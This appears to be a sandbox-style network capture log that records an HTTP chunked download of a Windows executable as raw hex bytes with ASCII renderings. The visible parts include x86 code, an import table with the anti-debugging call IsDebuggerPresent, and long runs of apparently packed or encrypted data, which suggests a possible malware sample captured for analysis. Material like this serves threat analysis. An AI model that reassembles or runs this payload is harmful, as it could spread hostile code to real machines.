                                                                                                  2023-06-21 18:24:31 UTC289INData Raw: 31 66 66 38 0d 0a c2 08 74 02 0b c3 f6 c2 04 74 05 0d 00 04 00 00 f6 c2 02 74 05 0d 00 08 00 00 f6 c2 01 74 05 0d 00 10 00 00 bf 00 01 00 00 f7 c2 00 00 08 00 74 02 0b c7 8b ca be 00 03 00 00 23 ce 74 1f 3b cf 74 16 3b cb 74 0b 3b ce 75 13 0d 00 60 00 00 eb 0c 0d 00 40 00 00 eb 05 0d 00 20 00 00 b9 00 00 00 03 5f 23 d1 5e 5b 81 fa 00 00 00 01 74 16 81 fa 00 00 00 02 74 0a 3b d1 75 0f 0d 00 80 00 00 c3 83 c8 40 c3 0d 40 80 00 00 c3 8b ff 55 8b ec 83 ec 14 53 56 57 9b d9 7d fc 66 8b 5d fc 33 d2 f6 c3 01 74 03 6a 10 5a f6 c3 04 74 03 83 ca 08 f6 c3 08 74 03 83 ca 04 f6 c3 10 74 03 83 ca 02 f6 c3 20 74 03 83 ca 01 f6 c3 02 74 06 81 ca 00 00 08 00 0f b7 cb 8b c1 be 00 0c 00 00 23 c6 bf 00 03 00 00 74 24 3d 00 04 00 00 74 17 3d 00 08 00 00 74 08 3b c6 75 12 0b
                                                                                                  Data Ascii: 1ff8ttttt#t;t;t;u`@ _#^[tt;u@@USVW}f]3tjZttt tt#t$=t=t;u
                                                                                                  2023-06-21 18:24:31 UTC297INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC297INData Raw: d2 8a ff ff b8 e0 42 41 00 e9 7c ee ff ff c7 05 20 65 47 00 e4 12 40 00 b9 20 65 47 00 e9 00 3a ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: BA| eG@ eG:
                                                                                                  2023-06-21 18:24:31 UTC305INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC305INData Raw: 32 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC313INData Raw: 68 61 6e 64 6c 65
                                                                                                  Data Ascii: handle
                                                                                                  2023-06-21 18:24:31 UTC313INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC313INData Raw: 32 30 30 30 0d 0a 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 a5 04 53 65 74 55 6e 68 61 6e 64 6c 65 64 45 78 63 65 70 74 69 6f 6e 46 69 6c 74 65 72 00 00 03 49 73 44 65 62 75 67 67 65 72 50 72 65 73 65 6e 74 00 c0 01 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 39 03 4c 65 61 76 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 00 6f 04 53 65 74 48 61 6e 64 6c 65 43 6f 75 6e 74 00 00 64 02 47 65 74 53 74 64 48 61 6e 64 6c 65 00 00 e3 02 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 41 6e 64 53 70 69 6e 43 6f 75 6e 74 00 f3 01 47 65 74 46 69 6c 65 54 79 70 65 00 d1 00 44 65 6c 65 74 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 00 52 00 43 6c 6f 73 65 48 61 6e 64 6c 65 00 19 01 45 78 69 74 50 72 6f 63 65
                                                                                                  Data Ascii: 2000dExceptionFilterSetUnhandledExceptionFilterIsDebuggerPresentGetCurrentProcess9LeaveCriticalSectionoSetHandleCountdGetStdHandleInitializeCriticalSectionAndSpinCountGetFileTypeDeleteCriticalSectionRCloseHandleExitProce
                                                                                                  2023-06-21 18:24:31 UTC321INData Raw: 51 c8 71 e6 ea 93
                                                                                                  Data Ascii: Qq
                                                                                                  2023-06-21 18:24:31 UTC321INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC321INData Raw: 32 30 30 30 0d 0a 44 26 6e d0 b6 fa f7 64 5f 12 08 73 0d 22 51 a2 3d 5d cc 55 08 e9 b9 db ca 57 ff 5e 16 38 ed dc f8 5e df 75 dc f1 20 fe fe 9e b1 f3 78 02 f9 47 c5 b2 53 06 ff d2 69 4b d8 9e bb 9c 72 18 6d 52 8e 86 95 26 b2 09 c3 dd a3 58 49 64 59 5f 0e 0a 86 c0 da a3 a3 51 23 f6 c9 f2 d8 7d 6a 28 55 9b 9b 79 41 f6 e1 3e a0 81 b7 b8 0a c9 30 d5 7a a6 0b 58 ed df c5 8c d4 92 a7 dc ae 85 20 10 7c f3 67 31 c6 ce a5 7e ed d9 72 34 8e bf 96 33 3c e1 a4 9f 03 7a 04 7a d9 6e a2 36 d1 ee 69 59 ef 56 28 b2 30 1c 29 4e b5 5a c7 0f c0 50 d1 6f e5 7f a8 4f b5 7a 69 8d 30 d4 8c 63 2c 6a 10 55 41 dd 7b b2 3f 2c 1e c9 93 c3 b3 f0 62 7e c8 1d dd 41 ca 00 e9 6b a6 49 05 70 35 6a 26 c8 7f 60 4f a3 d6 2f a5 31 37 83 f6 af 8c 75 3d 49 1d fb 8d e8 ac 9e 60 ad 25 ae 54 0f 08
                                                                                                  Data Ascii: 2000D&nd_s"Q=]UW^8^u xGSiKrmR&XIdY_Q#}j(UyA>0zX |g1~r43<zzn6iYV(0)NZPoOzi0c,jUA{?,b~AkIp5j&`O/17u=I`%T
                                                                                                  2023-06-21 18:24:31 UTC329INData Raw: 44 d1 70 37 cb d9
                                                                                                  Data Ascii: Dp7
                                                                                                  2023-06-21 18:24:31 UTC329INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC329INData Raw: 32 30 30 30 0d 0a c8 e0 05 f2 00 0d 7e 8a 78 4e d2 4a 45 be 8d 4b 9c 36 aa fb 05 ee e7 69 00 fd e9 77 96 e1 43 e4 4f ba 60 30 95 a8 46 a2 82 6c ab 2b 57 56 a9 5e e7 ea ff 5e db de 19 f5 55 03 31 c0 45 bf 50 15 d5 98 41 7a fd c8 43 82 0c d4 80 28 df 5d 16 a5 32 38 ea 0f 77 f8 1c bd 22 b3 2e a0 a8 9f a0 2f 91 bc 95 c9 bb c0 ff 08 cc f4 16 4d 3e 59 65 aa c3 84 b2 ca e0 85 e5 59 ac 60 1b 60 4c 6d 9e 16 f6 d2 8d e3 0c 5e 3c 7a 60 81 fa 90 cd 4c 81 9c 71 ba 6e ee b4 53 90 4d e5 27 56 52 44 6a ab 62 91 1c ee 36 42 42 b0 4b 24 85 bf ea 8c 37 d3 8a d2 b8 ac 5c 27 e6 59 08 2f 5a 1e 8a e5 e1 bc 45 c3 54 e6 ce a3 70 9a 89 f8 15 34 30 93 5d b4 fa d6 42 48 f4 64 89 e2 7b 02 60 54 21 fc 65 c9 27 85 96 e7 f5 fd a7 aa 55 a5 96 6f cb d2 b5 64 5b bf 92 e6 19 4e 15 fb 67 b9
                                                                                                  Data Ascii: 2000~xNJEK6iwCO`0Fl+WV^^U1EPAzC(]28w"./M>YeY``Lm^<z`LqnSM'VRDjb6BBK$7\'Y/ZETp40]BHd{`T!e'Uod[Ng
                                                                                                  2023-06-21 18:24:31 UTC337INData Raw: 8f 01 94 81 26 aa
                                                                                                  Data Ascii: &
                                                                                                  2023-06-21 18:24:31 UTC337INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC337INData Raw: 32 30 30 30 0d 0a 77 6c 76 99 58 e2 72 f9 6e f2 ae d6 99 9a 3e b6 d9 89 08 3d e2 a0 80 35 08 29 a1 03 36 01 15 cd 29 e3 09 54 08 a7 1b 33 30 eb 4a eb c7 09 56 28 08 89 fa 4f 52 97 e4 88 aa bd d1 a7 7f 49 3c d0 34 52 d2 c3 a1 4e 53 df c6 fe 29 25 0c 90 cd 46 bc 28 1d 9f 3f 0e 25 74 f8 1d c4 bb 67 ad 2f cc f4 a8 ac f6 29 00 69 50 1a b2 02 cb 67 79 37 a6 fc ca 48 89 1b 4d a8 86 a9 24 96 6f 24 74 4d 90 39 50 66 7b 8b af eb 33 24 2f 37 4b 0a 03 72 b2 34 4a d6 92 d9 06 ed 9d 6a 1a a1 da 15 fa d8 7a 1c 5e 2a cd 4d 46 e9 e8 78 9c d9 25 f3 6f 6f 23 b7 cf 04 78 6b 82 81 d3 b1 50 01 36 1a c3 ff 71 e4 1b db b5 1b 2a 9c d2 66 c1 13 04 46 34 33 12 a6 21 b0 a2 f4 1d 46 db 35 26 3e 7a 65 8b 8e 50 96 39 7a 66 fb e2 ea b1 8a 9a 83 19 c9 a8 b0 6f e6 ad db dc b4 2e 27 0a 44
                                                                                                  Data Ascii: 2000wlvXrn>=5)6)T30JV(ORI<4RNS)%F(?%tg/)iPgy7HM$o$tM9Pf{3$/7Kr4Jjz^*MFx%oo#xkP6q*fF43!F5&>zeP9zfo.'D
                                                                                                  2023-06-21 18:24:31 UTC345INData Raw: cf 88 fd 70 f4 23
                                                                                                  Data Ascii: p#
                                                                                                  2023-06-21 18:24:31 UTC345INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC345INData Raw: 32 30 30 30 0d 0a 9e e1 bf 0a 52 48 d9 e6 23 a5 ce ff 6f 8c 04 3b 47 3e 80 fd 91 9d 0b d6 c8 19 af f2 f0 12 0f 24 84 08 39 ec bf 3c 97 70 b3 6d 10 f5 8c b8 3b bd 35 55 bd 9e 30 e8 6c cb 01 61 2a 46 f9 76 15 1d ce a2 6e 50 df 17 d6 87 f0 46 96 21 28 d7 c0 5a 57 42 ad fd 19 58 26 8f b6 07 dc 1d 0c 92 ac 8f 67 c2 4b 97 6a 35 fb c6 fa 4b 93 22 68 3e bf 97 9c a1 dc 51 f0 22 0d de f6 ff e5 35 a9 de 44 8e 22 42 fb 16 6f a9 75 8b 04 0e 43 af da c1 76 7e 3a 66 fe ff ef d5 d7 b7 bb 66 d1 75 0d e4 7a 48 66 f4 db c2 09 4c 66 63 b6 9b 51 ec 8b 16 ea 72 88 af 46 1c ae bc 87 ad 6d 53 31 f7 5b 50 e5 e6 3b c0 be 59 05 fe b6 e2 2c 0e 91 c0 3e eb a4 e0 53 89 a5 7f 0b 8b 38 89 ad c3 35 e7 9e 66 f0 63 b0 8f c4 33 de c5 b0 97 e7 69 da 8e 0d 6f b9 41 bd 8e 8f cc 84 de 62 20 08
                                                                                                  Data Ascii: 2000RH#o;G>$9<pm;5U0la*FvnPF!(ZWBX&gKj5K"h>Q"5D"BouCv~:ffuzHfLfcQrFmS1[P;Y,>S85fc3ioAb
                                                                                                  2023-06-21 18:24:31 UTC353INData Raw: 4d 87 31 36 b6 3f
                                                                                                  Data Ascii: M16?
                                                                                                  2023-06-21 18:24:31 UTC353INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC353INData Raw: 31 66 66 38 0d 0a d9 da bb 5a 33 15 09 d5 6c 3d 08 34 72 bc e7 22 32 96 46 d8 b3 ba e3 8a 70 ba bc 00 77 d8 99 e9 05 19 15 8e 0f 7a 93 df ed f1 ef cd 05 b4 0c 9d 3e fb d4 ed c8 5b 6c c9 9c 52 e3 3e a8 05 6f 34 99 a9 7d 7c 70 1c d2 e1 c0 27 b4 c3 a9 23 67 10 d9 62 e3 e1 b7 8a 98 98 38 a6 05 73 3c f1 03 31 41 1b d3 2e bb 0e aa 40 26 91 9a 90 37 53 d4 6d bb fd f4 18 7e 24 d3 68 8a a7 6e a4 36 b8 7e ce a7 74 cb d1 62 3f ac ae 2f 1f e0 6a 8b 59 fd d8 1a 3b 7e 75 c2 56 1b 98 d3 b4 2b 0e 0d 85 f1 d4 43 2f bf e4 08 73 0e 2c d9 77 0c 4c d0 8e 12 88 76 e7 1c c7 ed f9 2a 5e 0f 4e d8 82 c2 d0 ab 4f 2d a0 f4 a7 52 87 f0 ce 9f 4b 96 31 62 91 7e a9 bb e2 2c 8c ac 6c 7e 06 91 3f 50 60 20 2d 66 55 d5 1f f3 4c b2 e4 21 57 c1 25 d2 9d 89 54 bf 4e 50 0b 39 be 11 3d c0 b6 03
                                                                                                  Data Ascii: 1ff8Z3l=4r"2Fpwz>[lR>o4}|p'#gb8s<1A.@&7Sm~$hn6~tb?/jY;~uV+C/s,wLv*^NO-RK1b~,l~?P` -fUL!W%TNP9=
                                                                                                  2023-06-21 18:24:31 UTC361INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC361INData Raw: 1b 72 f4 5f 9d 71 94 72 0f f6 4e 99 ff 60 29 73 d7 23 ca f0 dd 53 37 20 ef 10 5f 45 03 c0 77 09 d5 a1 d5 05 8e a2 87 fd 3b 96 13 60 a2 4a 79 fb 68 19 98 44 6a ad 08 42 61 ee fd 46 2d 6f f0 e3 e0 4e 66 3e 0f d4 59 8c ad 3d 80 5a de f1 ad eb 77 7f ef dc 5c a9 f2 8b e1 f8 51 bd 68 dd 96 ec 70 aa 7f cf 1e 45 8f cb 59 21 9a 30 54 90 48 ed 7b 0e fb c6 45 a8 8f 7b c3 07 40 08 cf fa a9 63 b7 b1 f5 a0 53 6e 5f 0c 17 cc 49 c7 e9 e1 ce 2d d4 3d 0d 0f 64 45 d9 29 ed b6 ef 1d d7 b4 28 10 8c 67 5b cd a3 a4 f2 dc ff fb 0a a6 30 28 3f 72 23 a1 1b cd 45 ce 02 dd cf 43 59 77 b7 7b 43 b8 bf bd 79 03 07 2c 6c f2 9b 8a a0 1a df fc 55 36 fd 10 e2 f5 81 e4 3d 67 ac f6 be 9e c7 5a 31 cc 2f 97 3d 84 37 05 75 ab 2a 6f 69 1f 45 3d d5 24 91 aa f0 39 d1 00 10 6d a3 07 06 de b1 7b fb
                                                                                                  Data Ascii: r_qrN`)s#S7 _Ew;`JyhDjBaF-oNf>Y=Zw\QhpEY!0TH{E{@cSn_I-=dE)(g[0(?r#ECYw{Cy,lU6=gZ1/=7u*oiE=$9m{
                                                                                                  2023-06-21 18:24:31 UTC369INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC369INData Raw: 32 30 30 30 0d 0a c2 4e 1f 90 46 8f 1a 11 49 31 a6 e7 5f 48 b7 15 f3 13 55 ce fa 83 e2 a0 ac 0d d8 1a e1 aa a2 4b 4e 4b 46 d4 bc af d1 87 67 60 fa a2 31 a9 07 f5 cc d4 8e 36 2d 5d 8f b8 50 3c 4a ae 4b 4e 0b 00 ba 3f bf 08 21 8e e7 29 42 2b 34 f0 33 5e d5 88 a3 71 a0 30 38 a3 68 a6 63 71 b9 63 83 9b 38 d7 a8 50 b3 9c 71 ff eb 1f 47 ac c0 52 72 a4 68 db 6c 69 15 7d 79 d4 af ae 8e 41 8a 27 76 07 0e c9 04 fd 54 e0 4e b2 71 3c 6d fd 82 7e 85 8e 92 cf 07 3a de 8c 5b 64 7b 62 a8 d5 b8 c8 39 ad e5 71 14 30 12 f1 68 5b 62 b9 fc 32 fc 4a cf 16 00 ba ba f6 80 1e 2f f8 02 03 99 b1 38 15 3b 8a 58 33 84 68 42 c9 7d 83 21 9e 25 26 c8 90 ec 85 c5 8c 87 6a 37 26 d5 23 ba 26 0b 6d 1b 55 95 af 83 8b 2e f7 63 51 c0 2e ec c8 d2 e8 a8 59 9a bf 98 72 c0 35 f4 f3 f9 79 7f 8d 03
                                                                                                  Data Ascii: 2000NFI1_HUKNKFg`16-]P<JKN?!)B+43^q08hcqc8PqGRrhli}yA'vTNq<m~:[d{b9q0h[b2J/8;X3hB}!%&j7&#&mU.cQ.Yr5y
                                                                                                  2023-06-21 18:24:31 UTC377INData Raw: 83 04 70 55 b9 8f
                                                                                                  Data Ascii: pU
                                                                                                  2023-06-21 18:24:31 UTC377INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC377INData Raw: 32 30 30 30 0d 0a 29 78 11 20 1a 2b 3f d3 a3 a4 e5 55 af 4e 53 3c d5 c3 d9 35 0b ee 09 11 fe 73 b9 83 6d 56 b1 19 e5 38 7a fe 27 d4 58 9e d3 5f 26 fb 72 3f 67 24 d8 32 58 ff a4 c0 a4 fd 06 15 58 62 03 94 2e 30 40 64 5c e8 d3 47 41 e3 31 93 d0 68 32 9f 05 8b 0d e9 88 2c 44 1b 3a 48 90 35 fb 0c 27 f3 f8 e9 5a 8f 60 ae 4a 9e 34 f0 99 ad 58 e5 5c 16 5f 5f db ba 01 38 eb 6b 1f 72 d2 7b 4c fa 35 73 bd 03 a2 34 14 83 6c 4f ca 94 40 0a 73 c4 9e 82 18 7a 4a 81 ee b9 3e df 9f 03 b7 63 6e 5f 70 fd dd 0d 91 47 5e ca 31 f1 f6 88 2e ac 2d fc 8f 00 6a b2 7e ea 40 a5 13 b4 58 86 50 c7 51 d7 9a 56 49 9a e5 44 d9 5d 24 d1 96 df 02 d3 24 a1 03 ad 5c 85 79 e9 57 73 59 f5 cb 61 df ee f5 9c 82 1b 74 5f fc 3e 56 7f 79 23 b8 9d d7 b6 2b 4d 2b 38 68 8c 1a 42 39 d4 0a 08 b9 6b 9c
                                                                                                  Data Ascii: 2000)x +?UNS<5smV8z'X_&r?g$2XXb.0@d\GA1h2,D:H5'Z`J4X\__8kr{L5s4lO@szJ>cn_pG^1.-j~@XPQVID]$$\yWsYat_>Vy#+M+8hB9k
                                                                                                  2023-06-21 18:24:31 UTC385INData Raw: 79 4e a1 9a f7 7c
                                                                                                  Data Ascii: yN|
                                                                                                  2023-06-21 18:24:31 UTC385INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC385INData Raw: 32 30 30 30 0d 0a d7 05 70 f7 15 b2 40 db d3 b3 c2 98 40 9a 0f bb 12 6a 52 e5 5f 28 5d 1b 8a be ba f9 b6 da b5 ff f7 99 98 ad 03 1c ac d6 94 28 2b 7a f8 1a a2 71 61 45 62 e8 b8 4d c6 81 f1 3a 2e a1 6f 01 93 7a 2e 52 24 66 cd db 4b d4 5e 7c 30 f3 18 85 fa 64 ea 56 05 54 32 c1 dc d0 a7 2f 3c ed 58 85 bd 41 24 8d 7c 14 24 07 68 9d e0 13 d9 c1 5e 39 88 5f 31 fb 90 e2 1e 8f 61 38 a3 f5 d6 f7 82 71 fa 27 f7 ad 09 58 e9 66 a3 c9 94 39 66 73 7e fb 67 fa 60 25 9a e7 ce ed 18 38 c6 37 1a ba b7 a7 92 1e 09 cd ad de 5f 63 c7 30 96 b7 0f f0 55 9d 74 77 58 86 5f c8 0b 9e 15 8b 4b fe 80 f0 b2 a7 37 8c 0a 0f cb 4c 5b b5 29 00 4e a9 57 21 7f 69 a8 46 f7 61 12 57 0b ac de 2e 06 e9 fa e9 d1 19 67 10 fa 3c 8f ab ca 56 65 53 7c 67 db 8d fa c5 f2 33 3b d0 fa d0 35 e7 5a 2a 2f
                                                                                                  Data Ascii: 2000p@@jR_(](+zqaEbM:.oz.R$fK^|0dVT2/<XA$|$h^9_1a8q'Xf9fs~g`%87_c0UtwX_K7L[)NW!iFaW.g<VeS|g3;5Z*/
                                                                                                  2023-06-21 18:24:31 UTC393INData Raw: 68 d0 a2 ed 86 04
                                                                                                  Data Ascii: h
                                                                                                  2023-06-21 18:24:31 UTC393INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC393INData Raw: 32 30 30 30 0d 0a a4 06 f1 ec 3a 97 05 70 90 ec bb 49 9a b5 67 d4 c7 45 6c 06 86 4a 69 06 5b 83 54 13 0f 5a a0 b7 6c 4a 49 49 04 ad 0f 11 a8 25 1c 80 4f bc 35 3c 2d ba 46 ad b1 5d cc 31 cd 9d e5 89 6f 6c de 19 27 2d 89 86 1e f8 c5 04 62 67 d2 5a c4 3b 94 a4 77 a7 f8 81 8c 56 95 fb ba 78 d1 d4 00 4d 7f 33 6f 4c ef 42 e8 e1 8f c5 01 8f bf 6d 29 cb ab 49 7d 36 7f c9 74 4a 47 b1 c0 99 cd 47 f7 10 a0 0c 2f 97 21 38 02 b3 02 76 67 93 68 b6 f1 ed b6 cd bb 2e b0 8a 69 af 87 9f fb 4b 9e d7 9d d6 b6 64 cf 4f 9d 01 23 0f 00 81 fc 49 d1 a5 ef 4b de 77 89 00 81 2b 97 60 ca 89 36 0b b0 99 f0 e6 9b 39 f4 8e ae 6a 0e 19 13 b0 43 f8 1d df cb 99 ef c7 d4 53 23 e8 ed 07 84 3f 39 a4 22 f2 39 69 be 1c 22 e4 6d ea 2e cf 57 cd 71 0d d8 7a 80 c8 25 44 1a 52 0d e3 24 52 00 e0 f9
                                                                                                  Data Ascii: 2000:pIgElJi[TZlJII%O5<-F]1ol'-bgZ;wVxM3oLBm)I}6tJGG/!8vgh.iKdO#IKw+`69jCS#?9"9i"m.Wqz%DR$R
                                                                                                  2023-06-21 18:24:31 UTC401INData Raw: 1a a1 bd 02 a7 29
                                                                                                  Data Ascii: )
                                                                                                  2023-06-21 18:24:31 UTC401INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC401INData Raw: 32 30 30 30 0d 0a 34 7c 2c e9 a0 0e 07 63 7a 9f 6b 8c 6b db d8 7a 90 38 f5 ac 63 84 ca e3 f8 e3 12 cb b8 42 b1 af 7f c3 01 14 be f0 6f fb 06 de 33 90 a2 99 9b af 6f 42 72 a2 17 7c ed 21 c6 91 ed 9e 51 d2 af 38 15 9a 33 d1 c4 96 a9 24 06 91 ab ab 98 59 f1 22 39 dd 8b 2c a6 90 3c bf fd 59 39 5e b4 62 c1 e3 6f fd 21 5e c1 19 e8 5a 1a c9 f0 4e f2 f4 f2 2c 5b 7a 19 8e 14 31 3e c0 78 aa 6c 0a aa 4e 4e 6e 9f a9 44 ea 95 e6 9a 21 1d 78 2c 61 27 c2 0a f2 37 35 ae d5 48 17 d8 fe 99 bd 8b 17 26 cc 27 ae 2b c1 49 50 f9 e4 5e ca 9a c1 4c 14 9d 27 fe d8 e0 a9 41 03 f9 9d 7c d8 9b 5a be 79 dc 81 99 69 6f 7f ea d7 ae 37 9f 4e f4 c0 a4 61 5c 1e 1c 68 a8 7d 93 31 a5 55 6c 30 36 88 ae 08 d0 b6 d7 f5 d9 6d 26 07 32 c5 62 de 0b 98 d8 34 e0 0e b3 e5 ee 43 24 1f 4d b9 34 f0 7d
                                                                                                  Data Ascii: 20004|,czkkz8cBo3oBr|!Q83$Y"9,<Y9^bo!^ZN,[z1>xlNNnD!x,a'75H&'+IP^L'A|Zyio7Na\h}1Ul06m&2b4C$M4}
                                                                                                  2023-06-21 18:24:31 UTC409INData Raw: 1e 82 a6 b8 e0 85
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC409INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC409INData Raw: 32 30 30 30 0d 0a b1 2e 73 20 2e 03 7a cd b8 07 fd 72 6d 82 f0 e9 2f d3 2d c9 30 6c 4e 91 c8 0f 38 51 a2 b0 79 32 6d b8 83 6f 11 17 11 f2 47 96 2b cf d7 eb 77 2d 84 95 ee 46 9e 57 b0 f1 cc 00 37 d3 48 cc dc 97 44 13 42 21 6b c2 70 76 c4 c3 42 5a 7d 4c e4 ae bd bf dc 20 19 de f4 6f 29 0d df 30 90 46 df ed 81 3d 66 32 5d 29 3e 38 ce d2 34 c9 31 4a d0 f7 4d a6 17 dc 80 f0 ca 41 53 bf 87 d1 14 c0 08 6f 5a d8 53 82 63 23 e4 cb 87 35 e1 1c 69 99 0b 3a ef c3 18 a5 61 38 0c eb a8 54 3c 2c 23 fc 57 42 73 48 c2 5b 4c 6d b7 f9 66 89 c4 55 e4 78 4e f9 4c d4 32 52 00 01 3c 5b 89 dc e0 80 d2 17 67 66 63 e9 64 7d 80 db dc 81 65 2e 94 02 4a 80 82 e1 75 23 cd ea ca d9 76 b6 fa c0 67 80 40 c6 b0 ac 0c 1a 12 c3 e0 99 d3 46 ee ca 49 b0 48 34 4f 26 8c 41 ac 09 a4 c8 e5 3a 59
                                                                                                  Data Ascii: 2000.s .zrm/-0lN8Qy2moG+w-FW7HDB!kpvBZ}L o)0F=f2])>841JMASoZSc#5i:a8T<,#WBsH[LmfUxNL2R<[gfcd}e.Ju#vg@FIH4O&A:Y
                                                                                                  2023-06-21 18:24:31 UTC417INData Raw: 20 3d 7d db 42 45
                                                                                                  Data Ascii: =}BE
                                                                                                  2023-06-21 18:24:31 UTC417INData Raw: 0d 0a
                                                                                                  Data Ascii:
                                                                                                  2023-06-21 18:24:31 UTC417INData Raw: 31 66 66 38 0d 0a 22 2e 90 37 aa 91 90 d5 b7 e9 f7 5b 9a 4a b9 da 42 81 a9 19 23 6f cf b6 84 8d e6 9e 10 56 60 70 22 a0 2d 13 6a b5 1f 74 e1 27 2b e1 49 a4 24 d5 af 07 e7 d2 d2 f5 f6 ac 4d 84 e8 28 ed 24 59 e1 51 17 f9 55 31 89 79 6c ab a5 00 7c b1 db 2a 86 b5 d0 fc 81 0c df d2 35 a5 5c fc 19 1c a1 70 5a ae 7c 6d 0e aa f2 4e d3 94 b7 16 0c 52 bd b8 3c b7 d1 d2 a6 5c c9 aa b2 60 6f 12 85 3b f0 9e 80 56 c0 a1 c3 b2 a0 1a 4b d6 30 a7 b1 ff b1 12 68 ea 99 b7 13 47 6d ce 24 03 3a 03 79 27 24 7a f2 c2 4f 05 9f 50 a1 d2 58 4c c0 a2 12 be 51 3f fb 20 3e 5b 25 74 b4 99 55 27 c6 8c f4 0a a5 e3 35 a8 52 fa 92 54 c2 f0 3d a8 17 8c 39 e2 dc ca ef ed 8f 5a a6 5f 16 06 88 c9 8d 96 2c f9 23 cc a1 35 57 ba f6 92 1a ad c0 60 40 e5 b3 1e 0c 3a 9d 20 21 74 3c a3 59 d7 a3 6c
                                                                                                  Data Ascii: 1ff8".7[JB#oV`p"-jt'+I$M($YQU1yl|*5\pZ|mNR<\`o;VK0hGm$:y'$zOPXLQ? >[%tU'5RT=9Z_,#5W`@: !t<Yl
                                                                                                  2023-06-21 18:24:31 UTC425INData Raw: 32 30 30 30 0d 0a
                                                                                                  Data Ascii: 2000
                                                                                                  2023-06-21 18:24:31 UTC425INData Raw: aa 26 ee 34 cd 76 be 4a bd 52 b9 8f e5 11 cc f3 13 b2 61 e4 81 2f 66 32 ea 6e 6d af 4d ed 08 17 47 7c 48 96 a0 dc 7f 60 69 30 0e 3b c3 b4 59 90 ba f4 3f 6a 16 d0 15 a7 3a 16 7a f7 fd 6f b9 be 4e 0f a8 ae 52 13 c5 c0 89 95 ed 1e de c1 df 5b d9 02 29 55 12 b1 31 70 73 cf 7c 2d 18 c3 5a 9f 2b 61 de 2d 4a f7 78 ab cf 5b 42 9a 31 55 c4 6e 71 97 77 1b 3d 95 a4 de ed d1 9f 7a f6 73 9d 71 95 bc a1 3a 86 17 a9 68 bc b2 7b c4 92 34 94 57 83 06 0b c7 c3 57 75 8c de 69 e0 6d cf 03 7e da 19 a0 5d 0b b8 33 ec 52 0d 25 4f 65 71 78 c0 2c f8 9c 71 b3 5a a0 27 1e b8 42 45 d5 c6 1c 1e 4b e8 32 02 e4 2a 21 73 34 5c 62 db 28 78 69 2a 21 a1 fd aa c2 17 dc 40 08 c2 5c 5d 96 93 7a 9b 76 bf 7b 0f cd f3 77 fb 24 4d 55 13 ef 4f c4 a0 ee 44 da bf 95 02 8a d7 a8 c7 21 66 ff 79 a9 2a
                                                                                                  Data Ascii: &4vJRa/f2nmMG|H`i0;Y?j:zoNR[)U1ps|-Z+a-Jx[B1Unqw=zsq:h{4WWuim~]3R%Oeqx,qZ'BEK2*!s4\b(xi*!@\]zv{w$MUOD!fy*
                                                                                                  2023-06-21 18:24:31 UTC433INData Raw: 0d 0a
